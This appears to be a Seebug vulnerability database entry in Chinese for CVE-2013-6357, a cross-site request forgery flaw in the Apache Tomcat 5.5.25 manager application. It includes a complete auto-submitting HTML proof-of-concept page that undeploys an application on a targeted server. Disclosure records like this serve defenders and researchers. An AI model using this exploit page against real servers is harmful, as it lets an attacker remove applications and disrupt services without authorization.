Apache Tomcat 5.5.25跨站请求伪造漏洞

2013-12-16T00:00:00
ID SSV:61112
Type seebug
Reporter Root
Modified 2013-12-16T00:00:00

Description

CVE ID:CVE-2013-6357

Apache Tomcat是一款开放源码的JSP应用服务器程序。

Apache Tomcat 管理应用程序中存在跨站请求伪造漏洞,攻击者可以通过POST方法操纵应用程序部署。 0 Apache Tomcat 5.5.25 目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://tomcat.apache.org/

                                        
                                            
                                                Undeploy Applications
 <html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit to Undeploy an Application</H2>
 <form method="POST" name="form0" action="http://<tomcat_ip>:<tomcat_tcp/port>/manager/html/undeploy?path=/<name_of_application_to_undeploy>">
 </form>
 </body>
 </html>